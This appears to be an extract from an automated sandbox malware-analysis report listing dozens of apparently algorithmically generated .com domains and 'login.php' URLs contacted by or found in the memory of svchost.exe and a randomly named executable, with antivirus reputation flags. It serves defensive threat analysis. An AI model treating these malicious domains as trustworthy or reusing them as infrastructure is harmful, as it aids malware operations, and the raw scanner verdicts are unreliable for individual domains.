                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    vofycyk.com
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      lyxywer.com
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      		unknowntrue
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        vojymuk.com
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        		unknowntrue
                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                          Contacted URLs

                                                                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          http://ww25.lyxynyx.com/login.php?subid1=20241112-0407-4879-ab0a-fce34aca034atrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://puzylyp.com/login.phptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://galyqaz.com/login.phptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                          URLs from Memory and Binaries

                                                                                                                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          http://pujylog.com/http://pujylog.com/Hsvchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pupymol.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576652644.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576507810.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qekyqoq.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vopycoc.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gaqykoz.com/login.phpsvchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841242367.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930409487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142459408.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2627419955.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716704828.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615554415.0000000002F1E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qekysel.com/http://lykyser.com/http://vofyzof.com/http://qeqyqep.com/svchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vojyzyt.com/login.phpsvchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qeqykop.com/login.phpsvchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vowydef.com/login.phpsvchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.0000000009333000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000933F000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.000000000147F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2086886336.0000000009540000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008403000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000C08000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puvycel.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyrywoj.com/login.phpsvchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482360119.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142459408.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138962739.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483073459.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615554415.0000000002F1E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyrynux.com/Hsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puvypoq.com/Hsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lysyvax.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puzytul.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://qegyhig.com/Prsvchost.exe, 00000002.00000003.1433691652.0000000008ABC000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gadykos.com/login.phpsvchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pumygyp.com/svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyvymej.com/login.phpsvchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559578676.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809959193.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559905278.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1825691340.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1821880893.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qedysyp.com/svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vowypim.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyryled.com/login.phpsvchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1487225312.0000000008B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qekyhil.com/login.phpsvchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lymyner.com/login.phpsvchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pufycol.com/login.phpcom/login.phpsvchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puzymup.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142459408.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615554415.0000000002F1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qedyhyl.com/login.phpsvchost.exe, 00000002.00000003.1533901430.0000000008B8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vojyduf.com/login.phpsvchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809959193.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qedyhiq.com/Hsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://ganydeh.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gatyqeb.com/Hsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vowykaf.com/login.phpsvchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1487225312.0000000008B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qetynev.com/login.phpsvchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puzytap.com/login.phpsvchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qegyval.com/login.phpsvchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498623748.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710718578.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710622766.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508538530.0000000008A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711822225.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486308101.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486513335.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711574837.000000000089E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qetyxiq.com/svchost.exe, 00000002.00000003.1665250528.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyxymin.com/svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vopygat.com/login.phpsvchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1545631030.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1537002580.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533884636.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539305897.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lygyxux.com/login.phpsvchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608386340.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2143261512.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2617654606.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2627419955.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1606037853.0000000008B24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gacycaz.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pumyjip.com/login.php?svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gahycuz.com/Psvchost.exe, 00000002.00000003.2481161521.0000000008A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623816509.0000000008A6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gadyhoh.com/login.phpsvchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://galyhib.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gahynuw.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2110053905.000000000D64A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gadydow.com/login.phpsvchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142459408.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615554415.0000000002F1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
